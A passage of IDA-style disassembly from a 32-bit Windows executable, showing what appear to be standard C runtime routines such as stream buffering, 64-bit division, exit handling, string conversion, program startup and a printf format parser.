test edi, edi
mov [ebp+arg_0], eax
mov ebx, edi
jnz short loc_417643
xor eax, eax
jmp loc_417710
; ---------------------------------------------------------------------------
loc_417643: ; CODE XREF: sub_41761F+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_417656
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_41765D
; ---------------------------------------------------------------------------
loc_417656: ; CODE XREF: sub_41761F+2D�j
mov [ebp+arg_C], 1000h
loc_41765D: ; CODE XREF: sub_41761F+35�j
; sub_41761F+E8�j
mov ecx, [esi+0Ch]
and ecx, 108h
jz short loc_417691
mov eax, [esi+4]
test eax, eax
jz short loc_417691
cmp ebx, eax
mov edi, ebx
jb short loc_417677
mov edi, eax
loc_417677: ; CODE XREF: sub_41761F+54�j
push edi
push [ebp+arg_0]
push dword ptr [esi]
call sub_4153F0
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
sub ebx, edi
add [ebp+arg_0], edi
jmp short loc_4176D7
; ---------------------------------------------------------------------------
loc_417691: ; CODE XREF: sub_41761F+47�j
; sub_41761F+4E�j
cmp ebx, [ebp+arg_C]
jb short loc_4176DC
test ecx, ecx
jz short loc_4176A5
push esi
call sub_418704
test eax, eax
pop ecx
jnz short loc_41771E
loc_4176A5: ; CODE XREF: sub_41761F+79�j
cmp [ebp+arg_C], 0
jz short loc_4176B8
mov eax, ebx
xor edx, edx
div [ebp+arg_C]
mov edi, ebx
sub edi, edx
jmp short loc_4176BA
; ---------------------------------------------------------------------------
loc_4176B8: ; CODE XREF: sub_41761F+8A�j
mov edi, ebx
loc_4176BA: ; CODE XREF: sub_41761F+97�j
push edi
push [ebp+arg_0]
push dword ptr [esi+10h]
call sub_41CCC7
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_417715
add [ebp+arg_0], eax
sub ebx, eax
cmp eax, edi
jb short loc_417715
loc_4176D7: ; CODE XREF: sub_41761F+70�j
mov edi, [ebp+var_4]
jmp short loc_417705
; ---------------------------------------------------------------------------
loc_4176DC: ; CODE XREF: sub_41761F+75�j
mov eax, [ebp+arg_0]
push esi
movsx eax, byte ptr [eax]
push eax
call sub_417C57
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41771E
inc [ebp+arg_0]
mov eax, [esi+18h]
dec ebx
mov [ebp+arg_C], eax
test eax, eax
jg short loc_417705
mov [ebp+arg_C], 1
loc_417705: ; CODE XREF: sub_41761F+BB�j
; sub_41761F+DD�j
test ebx, ebx
jnz loc_41765D
mov eax, [ebp+arg_8]
loc_417710: ; CODE XREF: sub_41761F+1F�j
; sub_41761F+108�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_417715: ; CODE XREF: sub_41761F+AD�j
; sub_41761F+B6�j
or dword ptr [esi+0Ch], 20h
mov eax, [ebp+var_4]
jmp short loc_417720
; ---------------------------------------------------------------------------
loc_41771E: ; CODE XREF: sub_41761F+84�j
; sub_41761F+CF�j
mov eax, edi
loc_417720: ; CODE XREF: sub_41761F+FD�j
sub eax, ebx
xor edx, edx
div [ebp+arg_4]
jmp short loc_417710
sub_41761F endp
; =============== S U B R O U T I N E =======================================
sub_417729 proc near ; CODE XREF: sub_40C0F3+8�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
call dword_421094 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jnz short loc_417749
call dword_421088 ; RtlGetLastWin32Error
push eax
call sub_41CE74
pop ecx
loc_417745: ; CODE XREF: sub_417729+3F�j
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_417749: ; CODE XREF: sub_417729+D�j
test al, 1
jz short loc_41776A
test [esp+arg_4], 2
jz short loc_41776A
mov dword_46BB04, 0Dh
mov dword_46BB08, 5
jmp short loc_417745
; ---------------------------------------------------------------------------
loc_41776A: ; CODE XREF: sub_417729+22�j
; sub_417729+29�j
xor eax, eax
retn
sub_417729 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417770 proc near ; CODE XREF: sub_40C21C+5F�p
; sub_40C21C+90�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_417791
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_417791: ; CODE XREF: sub_417770+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_4177AD
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_4177AD: ; CODE XREF: sub_417770+27�j
or eax, eax
jnz short loc_4177C9
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_41780A
; ---------------------------------------------------------------------------
loc_4177C9: ; CODE XREF: sub_417770+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_4177D7: ; CODE XREF: sub_417770+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_4177D7
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_417805
cmp edx, [esp+0Ch+arg_4]
ja short loc_417805
jb short loc_417806
cmp eax, [esp+0Ch+arg_0]
jbe short loc_417806
loc_417805: ; CODE XREF: sub_417770+85�j
; sub_417770+8B�j
dec esi
loc_417806: ; CODE XREF: sub_417770+8D�j
; sub_417770+93�j
xor edx, edx
mov eax, esi
loc_41780A: ; CODE XREF: sub_417770+57�j
dec edi
jnz short loc_417814
neg edx
neg eax
sbb edx, 0
loc_417814: ; CODE XREF: sub_417770+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_417770 endp
; =============== S U B R O U T I N E =======================================
sub_41781A proc near ; CODE XREF: .text:00417BAB�p
mov eax, off_4383BC
test eax, eax
jz short loc_417825
call eax ; sub_415DD3
loc_417825: ; CODE XREF: sub_41781A+7�j
push offset dword_423028
push offset dword_423014
call sub_417902
push offset dword_423010
push offset dword_423000
call sub_417902
add esp, 10h
retn
sub_41781A endp
; =============== S U B R O U T I N E =======================================
sub_417847 proc near ; CODE XREF: .text:00417BEA�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_417869
add esp, 0Ch
retn
sub_417847 endp
; =============== S U B R O U T I N E =======================================
sub_417858 proc near ; CODE XREF: .text:00417C09�p
; sub_417C0E+1C�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_417869
add esp, 0Ch
retn
sub_417858 endp
; =============== S U B R O U T I N E =======================================
sub_417869 proc near ; CODE XREF: sub_417847+8�p
; sub_417858+8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp dword_46BB4C, edi
jnz short loc_417886
push [esp+4+arg_0]
call dword_421104 ; GetCurrentProcess
push eax
call dword_421140 ; TerminateProcess
loc_417886: ; CODE XREF: sub_417869+A�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov dword_46BB48, edi
mov byte_46BB44, bl
jnz short loc_4178DA
mov eax, dword_46D17C
test eax, eax
jz short loc_4178C9
mov ecx, dword_46D178
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_4178C8
loc_4178B5: ; CODE XREF: sub_417869+5D�j
mov eax, [esi]
test eax, eax
jz short loc_4178BD
call eax
loc_4178BD: ; CODE XREF: sub_417869+50�j
sub esi, 4
cmp esi, dword_46D17C
jnb short loc_4178B5
loc_4178C8: ; CODE XREF: sub_417869+4A�j
pop esi
loc_4178C9: ; CODE XREF: sub_417869+3C�j
push offset dword_423034
push offset dword_42302C
call sub_417902
pop ecx
pop ecx
loc_4178DA: ; CODE XREF: sub_417869+33�j
push offset dword_423040
push offset dword_423038
call sub_417902
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_417900
push [esp+4+arg_0]
mov dword_46BB4C, edi
call dword_421114 ; ExitProcess
loc_417900: ; CODE XREF: sub_417869+85�j
pop edi
retn
sub_417869 endp
; =============== S U B R O U T I N E =======================================
sub_417902 proc near ; CODE XREF: sub_41781A+15�p
; sub_41781A+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_417907: ; CODE XREF: sub_417902+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_41791A
mov eax, [esi]
test eax, eax
jz short loc_417915
call eax
loc_417915: ; CODE XREF: sub_417902+F�j
add esi, 4
jmp short loc_417907
; ---------------------------------------------------------------------------
loc_41791A: ; CODE XREF: sub_417902+9�j
pop esi
retn
sub_417902 endp
; =============== S U B R O U T I N E =======================================
sub_41791C proc near ; CODE XREF: sub_40CD3A+29D7�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_421118 ; DeleteFileA
test eax, eax
jnz short loc_417932
call dword_421088 ; RtlGetLastWin32Error
jmp short loc_417934
; ---------------------------------------------------------------------------
loc_417932: ; CODE XREF: sub_41791C+C�j
xor eax, eax
loc_417934: ; CODE XREF: sub_41791C+14�j
test eax, eax
jz short loc_417943
push eax
call sub_41CE74
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_417943: ; CODE XREF: sub_41791C+1A�j
xor eax, eax
retn
sub_41791C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417950 proc near ; CODE XREF: sub_4129E5+1D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
test eax, eax
jz short locret_41799C
mov edx, [esp+arg_0]
push esi
push edi
mov esi, edx
mov edi, [esp+8+arg_4]
or edx, edi
and edx, 3
jz short loc_41799D
test eax, 1
jz short loc_41797D
mov cl, [esi]
cmp cl, [edi]
jnz short loc_4179CA
inc esi
inc edi
dec eax
jz short loc_41799A
loc_41797D: ; CODE XREF: sub_417950+20�j
; sub_417950+48�j
mov cl, [esi]
mov dl, [edi]
cmp cl, dl
jnz short loc_4179CA
mov cl, [esi+1]
mov dl, [edi+1]
cmp cl, dl
jnz short loc_4179CA
add edi, 2
add esi, 2
sub eax, 2
jnz short loc_41797D
loc_41799A: ; CODE XREF: sub_417950+2B�j
; sub_417950+84�j
pop edi
pop esi
locret_41799C: ; CODE XREF: sub_417950+6�j
retn
; ---------------------------------------------------------------------------
loc_41799D: ; CODE XREF: sub_417950+19�j
mov ecx, eax
and eax, 3
shr ecx, 2
jz short loc_4179D2
repe cmpsd
jz short loc_4179D2
mov ecx, [esi-4]
mov edx, [edi-4]
cmp cl, dl
jnz short loc_4179C5
cmp ch, dh
jnz short loc_4179C5
shr ecx, 10h
shr edx, 10h
cmp cl, dl
jnz short loc_4179C5
cmp ch, dh
loc_4179C5: ; CODE XREF: sub_417950+63�j
; sub_417950+67�j ...
mov eax, 0
loc_4179CA: ; CODE XREF: sub_417950+26�j
; sub_417950+33�j ...
sbb eax, eax
pop edi
sbb eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_4179D2: ; CODE XREF: sub_417950+55�j
; sub_417950+59�j
test eax, eax
jz short loc_41799A
mov edx, [esi]
mov ecx, [edi]
cmp dl, cl
jnz short loc_4179C5
dec eax
jz short loc_4179F9
cmp dh, ch
jnz short loc_4179C5
dec eax
jz short loc_4179F9
and ecx, 0FF0000h
and edx, 0FF0000h
cmp edx, ecx
jnz short loc_4179C5
dec eax
loc_4179F9: ; CODE XREF: sub_417950+8F�j
; sub_417950+96�j
pop edi
pop esi
retn
sub_417950 endp
; =============== S U B R O U T I N E =======================================
sub_4179FC proc near ; CODE XREF: sub_413B27+55�p
; sub_414500+238�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp word ptr [ecx], 0
lea eax, [ecx+2]
jz short loc_417A13
loc_417A09: ; CODE XREF: sub_4179FC+15�j
mov dx, [eax]
inc eax
inc eax
test dx, dx
jnz short loc_417A09
loc_417A13: ; CODE XREF: sub_4179FC+B�j
sub eax, ecx
sar eax, 1
dec eax
retn
sub_4179FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417A19 proc near ; CODE XREF: sub_413B27+19�p
; sub_413B27+49�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
push ebx
push esi
xor esi, esi
xor eax, eax
cmp edx, esi
push edi
jz loc_417AE6
mov edi, [ebp+arg_8]
cmp edi, esi
jz loc_417B13
cmp dword_46BB9C, esi
jnz short loc_417A6A
cmp edi, esi
jbe loc_417B13
loc_417A49: ; CODE XREF: sub_417A19+4A�j
mov ecx, [ebp+arg_4]
add ecx, eax
movzx si, byte ptr [ecx]
mov [edx], si
cmp byte ptr [ecx], 0
jz loc_417B13
inc eax
inc edx
inc edx
cmp eax, edi
jb short loc_417A49
jmp loc_417B13
; ---------------------------------------------------------------------------
loc_417A6A: ; CODE XREF: sub_417A19+26�j
mov ebx, [ebp+arg_4]
mov esi, dword_421064
push edi
push edx
push 0FFFFFFFFh
push ebx
push 9
push dword_46BBAC
call esi ; MultiByteToWideChar
test eax, eax
jnz loc_417B12
call dword_421088 ; RtlGetLastWin32Error
cmp eax, 7Ah
jz short loc_417AA4
loc_417A95: ; CODE XREF: sub_417A19+CB�j
; sub_417A19+F7�j
mov dword_46BB04, 2Ah
or eax, 0FFFFFFFFh
jmp short loc_417B13
; ---------------------------------------------------------------------------
loc_417AA4: ; CODE XREF: sub_417A19+7A�j
lea ecx, [edi-1]
mov eax, ebx
mov [ebp+arg_4], ecx
loc_417AAC: ; CODE XREF: sub_417A19+B3�j
mov cl, [eax]
test cl, cl
jz short loc_417ACE
mov edx, off_4383F0
movzx ecx, cl
test byte ptr [edx+ecx*2+1], 80h
jz short loc_417AC3
inc eax
loc_417AC3: ; CODE XREF: sub_417A19+A7�j
mov ecx, [ebp+arg_4]
inc eax
dec [ebp+arg_4]
test ecx, ecx
jnz short loc_417AAC
loc_417ACE: ; CODE XREF: sub_417A19+97�j
push edi
sub eax, ebx
push [ebp+arg_0]
push eax
push ebx
push 1
push dword_46BBAC
call esi ; MultiByteToWideChar
test eax, eax
jnz short loc_417B13
jmp short loc_417A95
; ---------------------------------------------------------------------------
loc_417AE6: ; CODE XREF: sub_417A19+F�j
cmp dword_46BB9C, esi
jnz short loc_417AF9
push [ebp+arg_4]
call sub_415B10
pop ecx
jmp short loc_417B13
; ---------------------------------------------------------------------------
loc_417AF9: ; CODE XREF: sub_417A19+D3�j
push esi
push esi
push 0FFFFFFFFh
push [ebp+arg_4]
push 9
push dword_46BBAC
call dword_421064 ; MultiByteToWideChar
cmp eax, esi
jz short loc_417A95
loc_417B12: ; CODE XREF: sub_417A19+6B�j
dec eax
loc_417B13: ; CODE XREF: sub_417A19+1A�j
; sub_417A19+2A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_417A19 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421678
push offset sub_41D6A4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp-18h], esp
call dword_42116C ; GetVersion
xor edx, edx
mov dl, ah
mov dword_46BB1C, edx
mov ecx, eax
and ecx, 0FFh
mov dword_46BB18, ecx
shl ecx, 8
add ecx, edx
mov dword_46BB14, ecx
shr eax, 10h
mov dword_46BB10, eax
xor esi, esi
push esi
call sub_418C18
pop ecx
test eax, eax
jnz short loc_417B84
push 1Ch
call sub_417C33
pop ecx
loc_417B84: ; CODE XREF: .text:00417B7A�j
mov [ebp-4], esi
call sub_41D4EF
call dword_421168 ; GetCommandLineA
mov dword_46D16C, eax
call sub_41D3BD
mov dword_46BB50, eax
call sub_41D170
call sub_41D0B7
call sub_41781A
mov [ebp-30h], esi
lea eax, [ebp-5Ch]
push eax
call dword_421164 ; GetStartupInfoA
call sub_41D05F
mov [ebp-64h], eax
test byte ptr [ebp-30h], 1
jz short loc_417BD1
movzx eax, word ptr [ebp-2Ch]
jmp short loc_417BD4
; ---------------------------------------------------------------------------
loc_417BD1: ; CODE XREF: .text:00417BC9�j
push 0Ah
pop eax
loc_417BD4: ; CODE XREF: .text:00417BCF�j
push eax
push dword ptr [ebp-64h]
push esi
push esi
call dword_4210C8 ; GetModuleHandleA
push eax
call sub_40C574
mov [ebp-60h], eax
push eax
call sub_417847
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call sub_41CEDB
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_417858
; =============== S U B R O U T I N E =======================================
sub_417C0E proc near ; CODE XREF: sub_4166E2+16�p
; sub_41D0B7+4E�p ...
arg_0 = dword ptr 4
cmp dword_46BB58, 1
jnz short loc_417C1C
call sub_41D77C
loc_417C1C: ; CODE XREF: sub_417C0E+7�j
push [esp+arg_0]
call sub_41D7B5
push 0FFh
call off_4383E0
pop ecx
pop ecx
retn
sub_417C0E endp
; =============== S U B R O U T I N E =======================================
sub_417C33 proc near ; CODE XREF: .text:00417B7E�p
arg_0 = dword ptr 4
cmp dword_46BB58, 1
jnz short loc_417C41
call sub_41D77C
loc_417C41: ; CODE XREF: sub_417C33+7�j
push [esp+arg_0]
call sub_41D7B5
pop ecx
push 0FFh
call dword_421114 ; ExitProcess
retn
sub_417C33 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417C57 proc near ; CODE XREF: sub_415316+46�p
; sub_41588A+45�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
mov ebx, [esi+10h]
test al, 82h
jz loc_417D60
test al, 40h
jnz loc_417D60
test al, 1
jz short loc_417C8F
and dword ptr [esi+4], 0
test al, 10h
jz loc_417D60
mov ecx, [esi+8]
and al, 0FEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_417C8F: ; CODE XREF: sub_417C57+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and al, 0EFh
or al, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_417CC9
cmp esi, offset dword_43AB28
jz short loc_417CB7
cmp esi, offset dword_43AB48
jnz short loc_417CC2
loc_417CB7: ; CODE XREF: sub_417C57+56�j
push ebx
call sub_41D94C
test eax, eax
pop ecx
jnz short loc_417CC9
loc_417CC2: ; CODE XREF: sub_417C57+5E�j
push esi
call sub_41D908
pop ecx
loc_417CC9: ; CODE XREF: sub_417C57+4E�j
; sub_417C57+69�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_417D36
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_417CF9
push edi
push eax
push ebx
call sub_41CCC7
add esp, 0Ch
mov [ebp+arg_4], eax
jmp short loc_417D2C
; ---------------------------------------------------------------------------
loc_417CF9: ; CODE XREF: sub_417C57+90�j
cmp ebx, 0FFFFFFFFh
jz short loc_417D14
mov eax, ebx
mov ecx, ebx
sar eax, 5
and ecx, 1Fh
mov eax, dword_46CE20[eax*4]
lea eax, [eax+ecx*8]
jmp short loc_417D19
; ---------------------------------------------------------------------------
loc_417D14: ; CODE XREF: sub_417C57+A5�j
mov eax, offset dword_43AA70
loc_417D19: ; CODE XREF: sub_417C57+BB�j
test byte ptr [eax+4], 20h
jz short loc_417D2C
push 2
push 0
push ebx
call sub_41C447
add esp, 0Ch
loc_417D2C: ; CODE XREF: sub_417C57+A0�j
; sub_417C57+C6�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_417D4A
; ---------------------------------------------------------------------------
loc_417D36: ; CODE XREF: sub_417C57+79�j
push 1
lea eax, [ebp+arg_0]
pop edi
push edi
push eax
push ebx
call sub_41CCC7
add esp, 0Ch
mov [ebp+arg_4], eax
loc_417D4A: ; CODE XREF: sub_417C57+DD�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_417D56
or dword ptr [esi+0Ch], 20h
jmp short loc_417D65
; ---------------------------------------------------------------------------
loc_417D56: ; CODE XREF: sub_417C57+F7�j
mov eax, [ebp+arg_0]
and eax, 0FFh
jmp short loc_417D68
; ---------------------------------------------------------------------------
loc_417D60: ; CODE XREF: sub_417C57+10�j
; sub_417C57+18�j ...
or al, 20h
mov [esi+0Ch], eax
loc_417D65: ; CODE XREF: sub_417C57+FD�j
or eax, 0FFFFFFFFh
loc_417D68: ; CODE XREF: sub_417C57+107�j
pop esi
pop ebx
pop ebp
retn
sub_417C57 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417D6C proc near ; CODE XREF: sub_415316+29�p
; sub_41588A+28�p ...
var_248 = byte ptr -248h
var_247 = byte ptr -247h
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 248h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+var_C], esi
mov [ebp+var_14], esi
mov [ebp+arg_4], edi
jz loc_418485
mov ecx, [ebp+var_10]
xor edx, edx
jmp short loc_417DA0
; ---------------------------------------------------------------------------
loc_417D98: ; CODE XREF: sub_417D6C+713�j
mov ecx, [ebp+var_10]
mov esi, [ebp+var_30]
xor edx, edx
loc_417DA0: ; CODE XREF: sub_417D6C+2A�j
cmp [ebp+var_14], edx
jl loc_418485
cmp bl, 20h
jl short loc_417DC1
cmp bl, 78h
jg short loc_417DC1
movsx eax, bl
mov al, [eax+421664h]
and eax, 0Fh
jmp short loc_417DC3
; ---------------------------------------------------------------------------
loc_417DC1: ; CODE XREF: sub_417D6C+40�j
; sub_417D6C+45�j
xor eax, eax
loc_417DC3: ; CODE XREF: sub_417D6C+53�j
movsx eax, byte_421684[esi+eax*8]
sar eax, 4
cmp eax, 7 ; switch 8 cases
mov [ebp+var_30], eax
ja loc_418474 ; default
jmp off_41848D[eax*4] ; switch jump
loc_417DE1: ; DATA XREF: .text:off_41848D�o
or [ebp+var_10], 0FFFFFFFFh ; jumptable 00417DDA case 1
mov [ebp+var_34], edx
mov [ebp+var_28], edx
mov [ebp+var_20], edx
mov [ebp+var_1C], edx
mov [ebp+var_4], edx
mov [ebp+var_24], edx
jmp loc_418474 ; default
; ---------------------------------------------------------------------------
loc_417DFC: ; CODE XREF: sub_417D6C+6E�j
; DATA XREF: .text:off_41848D�o
movsx eax, bl ; jumptable 00417DDA case 2
sub eax, 20h
jz short loc_417E3F
sub eax, 3
jz short loc_417E36
sub eax, 8
jz short loc_417E2D
dec eax
dec eax
jz short loc_417E24
sub eax, 3
jnz loc_418474 ; default
or [ebp+var_4], 8
jmp loc_418474 ; default
; ---------------------------------------------------------------------------
loc_417E24: ; CODE XREF: sub_417D6C+A4�j
or [ebp+var_4], 4
jmp loc_418474 ; default
; ---------------------------------------------------------------------------
loc_417E2D: ; CODE XREF: sub_417D6C+A0�j
or [ebp+var_4], 1
jmp loc_418474 ; default
; ---------------------------------------------------------------------------
loc_417E36: ; CODE XREF: sub_417D6C+9B�j
or byte ptr [ebp+var_4], 80h
jmp loc_418474 ; default
; ---------------------------------------------------------------------------
loc_417E3F: ; CODE XREF: sub_417D6C+96�j
or [ebp+var_4], 2
jmp loc_418474 ; default
; ---------------------------------------------------------------------------
loc_417E48: ; CODE XREF: sub_417D6C+6E�j
; DATA XREF: .text:off_41848D�o
cmp bl, 2Ah ; jumptable 00417DDA case 3
jnz short loc_417E70
lea eax, [ebp+arg_8]
push eax
call sub_41854B
test eax, eax
pop ecx
mov [ebp+var_20], eax
jge loc_418474 ; default
or [ebp+var_4], 4
neg eax
loc_417E68: ; CODE XREF: sub_417D6C+111�j
mov [ebp+var_20], eax
jmp loc_418474 ; default
; ---------------------------------------------------------------------------
loc_417E70: ; CODE XREF: sub_417D6C+DF�j
mov eax, [ebp+var_20]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
jmp short loc_417E68
; ---------------------------------------------------------------------------
loc_417E7F: ; CODE XREF: sub_417D6C+6E�j
; DATA XREF: .text:off_41848D�o
mov [ebp+var_10], edx ; jumptable 00417DDA case 4
jmp loc_418474 ; default
; ---------------------------------------------------------------------------
loc_417E87: ; CODE XREF: sub_417D6C+6E�j
; DATA XREF: .text:off_41848D�o
cmp bl, 2Ah ; jumptable 00417DDA case 5
jnz short loc_417EAA
lea eax, [ebp+arg_8]
push eax
call sub_41854B
test eax, eax
pop ecx
mov [ebp+var_10], eax
jge loc_418474 ; default
or [ebp+var_10], 0FFFFFFFFh
jmp loc_418474 ; default
; ---------------------------------------------------------------------------
loc_417EAA: ; CODE XREF: sub_417D6C+11E�j
lea eax, [ecx+ecx*4]
movsx ecx, bl
lea eax, [ecx+eax*2-30h]
mov [ebp+var_10], eax
jmp loc_418474 ; default
; ---------------------------------------------------------------------------
loc_417EBC: ; CODE XREF: sub_417D6C+6E�j
; DATA XREF: .text:off_41848D�o
cmp bl, 49h ; jumptable 00417DDA case 6
jz short loc_417EEF
cmp bl, 68h
jz short loc_417EE6
cmp bl, 6Ch
jz short loc_417EDD
cmp bl, 77h
jnz loc_418474 ; default
or byte ptr [ebp+var_4+1], 8
jmp loc_418474 ; default
; ---------------------------------------------------------------------------
loc_417EDD: ; CODE XREF: sub_417D6C+15D�j
or [ebp+var_4], 10h
jmp loc_418474 ; default
; ---------------------------------------------------------------------------
loc_417EE6: ; CODE XREF: sub_417D6C+158�j
or [ebp+var_4], 20h
jmp loc_418474 ; default
; ---------------------------------------------------------------------------
loc_417EEF: ; CODE XREF: sub_417D6C+153�j
cmp byte ptr [edi], 36h
jnz short loc_417F08
cmp byte ptr [edi+1], 34h
jnz short loc_417F08
inc edi
inc edi
or byte ptr [ebp+var_4+1], 80h
mov [ebp+arg_4], edi
jmp loc_418474 ; default
; ---------------------------------------------------------------------------
loc_417F08: ; CODE XREF: sub_417D6C+186�j
; sub_417D6C+18C�j
mov [ebp+var_30], edx
loc_417F0B: ; CODE XREF: sub_417D6C+6E�j
; DATA XREF: .text:off_41848D�o
mov ecx, off_4383F0 ; jumptable 00417DDA case 0
mov [ebp+var_24], edx
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_417F37
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_4184AD
mov bl, [edi]
add esp, 0Ch
inc edi
mov [ebp+arg_4], edi
loc_417F37: ; CODE XREF: sub_417D6C+1B0�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_4184AD
add esp, 0Ch
jmp loc_418474 ; default
; ---------------------------------------------------------------------------
loc_417F4F: ; CODE XREF: sub_417D6C+6E�j
; DATA XREF: .text:off_41848D�o
movsx eax, bl ; jumptable 00417DDA case 7
cmp eax, 67h
jg loc_418177
cmp eax, 65h
jge loc_417FFA
cmp eax, 58h
jg loc_418058
jz loc_4181EB
sub eax, 43h
jz loc_41801B
dec eax
dec eax
jz short loc_417FF0
dec eax
dec eax
jz short loc_417FF0
sub eax, 0Ch
jnz loc_418376
test word ptr [ebp+var_4], 830h
jnz short loc_417F99
or byte ptr [ebp+var_4+1], 8
loc_417F99: ; CODE XREF: sub_417D6C+227�j
; sub_417D6C+42A�j
mov esi, [ebp+var_10]
cmp esi, 0FFFFFFFFh
jnz short loc_417FA6
mov esi, 7FFFFFFFh
loc_417FA6: ; CODE XREF: sub_417D6C+233�j
lea eax, [ebp+arg_8]
push eax
call sub_41854B
test word ptr [ebp+var_4], 810h
pop ecx
mov ecx, eax
mov [ebp+var_8], ecx
jz loc_4181BF
test ecx, ecx
jnz short loc_417FCE
mov ecx, off_4383EC
mov [ebp+var_8], ecx
loc_417FCE: ; CODE XREF: sub_417D6C+257�j
mov [ebp+var_24], 1
mov eax, ecx
loc_417FD7: ; CODE XREF: sub_417D6C+282�j
mov edx, esi
dec esi
test edx, edx
jz loc_4181B6
cmp word ptr [eax], 0
jz loc_4181B6
inc eax
inc eax
jmp short loc_417FD7
; ---------------------------------------------------------------------------
loc_417FF0: ; CODE XREF: sub_417D6C+212�j
; sub_417D6C+216�j
mov [ebp+var_34], 1
add bl, 20h
